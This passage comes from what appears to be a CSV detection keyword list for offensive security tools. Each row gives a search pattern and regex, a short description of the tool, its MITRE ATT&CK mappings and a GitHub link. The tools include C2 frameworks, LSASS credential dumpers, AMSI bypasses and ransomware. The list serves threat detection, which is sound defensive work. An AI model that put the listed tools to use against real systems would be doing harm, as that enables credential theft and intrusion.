TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_rest.Payload*",".{0,1000}mythic_rest\.Payload.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_service.py*",".{0,1000}mythic_service\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_translator_containter*",".{0,1000}mythic_translator_containter.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*MythicAgents/Apollo*",".{0,1000}MythicAgents\/Apollo.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*MythicAgents/Athena*",".{0,1000}MythicAgents\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*MythicAgents/merlin*",".{0,1000}MythicAgents\/merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*MythicAgents/tetanus*",".{0,1000}MythicAgents\/tetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*mythic-cli *",".{0,1000}mythic\-cli\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic-cli*athena*",".{0,1000}mythic\-cli.{0,1000}athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*MythicClient.cs*",".{0,1000}MythicClient\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*mythic-docker*",".{0,1000}mythic\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*MzHmO/DebugAmsi*",".{0,1000}MzHmO\/DebugAmsi.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*MzHmO/NtlmThief*",".{0,1000}MzHmO\/NtlmThief.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*MzHmO/Parasite-Invoke*",".{0,1000}MzHmO\/Parasite\-Invoke.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*MzHmO/PowershellKerberos*",".{0,1000}MzHmO\/PowershellKerberos.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*MzHmO/Privileger*",".{0,1000}MzHmO\/Privileger.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*MzHmO/TGSThief*",".{0,1000}MzHmO\/TGSThief.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*n00py/LAPSDumper*",".{0,1000}n00py\/LAPSDumper.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*n00py/Slackor*",".{0,1000}n00py\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*n0de.exe*elevationstation*",".{0,1000}n0de\.exe.{0,1000}elevationstation.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*n1k7l4i/goMatrixC2*",".{0,1000}n1k7l4i\/goMatrixC2.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*n1k7l4i/goZulipC2*",".{0,1000}n1k7l4i\/goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*n1nj4sec*",".{0,1000}n1nj4sec.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nac_bypass*",".{0,1000}nac_bypass.{0,1000}","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","247","65","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" "*nagios-root-privesc.sh*",".{0,1000}nagios\-root\-privesc\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*naksyn/Pyramid*",".{0,1000}naksyn\/Pyramid.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*--name chisel -p *",".{0,1000}\-\-name\schisel\s\-p\s.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*named_pipes.txt*",".{0,1000}named_pipes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NamedPipeImpersonation.cs*",".{0,1000}NamedPipeImpersonation\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*NamedPipeServer.ps1*",".{0,1000}NamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*namespace BackupCreds*",".{0,1000}namespace\sBackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*namespace CredPhisher*",".{0,1000}namespace\sCredPhisher.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*namespace Jasmin_Encrypter*",".{0,1000}namespace\sJasmin_Encrypter.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*namespace KrbRelayUp*",".{0,1000}namespace\sKrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*namespace NTLMInjector*",".{0,1000}namespace\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*namespace POSTDump*",".{0,1000}namespace\sPOSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*namespace POSTMiniDump*",".{0,1000}namespace\sPOSTMiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*namespace RedPersist.Persist*",".{0,1000}namespace\sRedPersist\.Persist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*namespace RemotePipeList*",".{0,1000}namespace\sRemotePipeList.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*namespace SharpShares*",".{0,1000}namespace\sSharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*namespace SilentCryptoMiner*",".{0,1000}namespace\sSilentCryptoMiner.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*namespace WheresMyImplant*",".{0,1000}namespace\sWheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*nandydark/Linux-keylogger*",".{0,1000}nandydark\/Linux\-keylogger.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*nanjmdknhkinifnkgdcggcfnhdaammmj*",".{0,1000}nanjmdknhkinifnkgdcggcfnhdaammmj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nanodump *",".{0,1000}nanodump\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump -*",".{0,1000}nanodump\s\-.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.git*",".{0,1000}nanodump\.git.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x64*",".{0,1000}nanodump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x64.exe*",".{0,1000}nanodump\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x86*",".{0,1000}nanodump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_dump*",".{0,1000}nanodump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*nanodump_pipe*",".{0,1000}nanodump_pipe.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*nanodump_ppl.x64.dll*",".{0,1000}nanodump_ppl\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanodump_ppl_dump*",".{0,1000}nanodump_ppl_dump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x64*",".{0,1000}nanodump_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x86*",".{0,1000}nanodump_ppl_dump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic*",".{0,1000}nanodump_ppl_medic.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x64*",".{0,1000}nanodump_ppl_medic\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x86*",".{0,1000}nanodump_ppl_medic\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64*",".{0,1000}nanodump_ssp\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp.x86*",".{0,1000}nanodump_ssp\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ssp_embedded.*",".{0,1000}nanodump_ssp_embedded\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*NanoDumpChoose*",".{0,1000}NanoDumpChoose.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 